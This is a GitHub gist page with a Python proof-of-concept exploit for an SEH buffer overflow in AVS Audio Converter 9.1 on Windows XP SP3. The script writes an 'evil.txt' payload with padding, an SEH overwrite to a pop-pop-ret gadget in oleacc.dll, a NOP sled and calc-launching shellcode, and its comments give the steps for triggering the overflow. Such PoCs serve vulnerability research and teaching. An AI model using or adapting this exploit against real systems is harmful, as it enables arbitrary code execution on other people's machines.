Skip to content

Instantly share code, notes, and snippets.

@hexabin hexabin/avs_exploit.py
Last active Jan 16, 2020

Embed
What would you like to do?
A working exploit PoC for AVS Audio Converter 9.1 (SEH Buffer Overflow)
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: AVS Audio Converter 9.1 #
# OS: WinXP SP3 #
# Author: Hexabin(@TheRealHexabin - Twitter) #
# Software: https://www.avs4you.com/avs-audio-converter.aspx #
# #
# Original Author: ZwX #
# Link to Original Exploit: https://www.exploit-db.com/exploits/47788 #
#----------------------------------------------------------------------------------#
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
#----------------------------------------------------------------------------------#
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# 0x74c9ea1e : pop ebx # pop edi # ret 0x10 | {PAGE_EXECUTE_READ} [oleacc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.2.5406.0 (C:\WINDOWS\system32\oleacc.dll) #
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#Proof of Concept (PoC):
#=======================
# 1. Download and install AVS Audio Converter
# 2. Open the AVS Audio Converter
# 3. Run the python script to create the file evil.txt
# 4. Copy and paste the characters found in the file (evil.txt) in the field "Output Folder"
# 5. Click on browse
# 6. pWnEd!
filename = "evil.txt"
shellcode = ( # Windows XP SP3 Calc.exe http://shell-storm.org/shellcode/files/shellcode-739.php
"\x31\xC9"
"\x51"
"\x68\x63\x61\x6C\x63"
"\x54"
"\xB8\xC7\x93\xC2\x77"
"\xFF\xD0"
)
nseh = "\xEB\x06\x90\x90"
seh = "\x1E\xEA\xC9\x74"
nopsled = "\x90"*20
junk = (1212 - len(shellcode))*"D"
buffer = "A"*260 + nseh + seh + nopsled + shellcode + junk
textFile = open(filename, "w")
textFile.write(buffer)
textFile.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.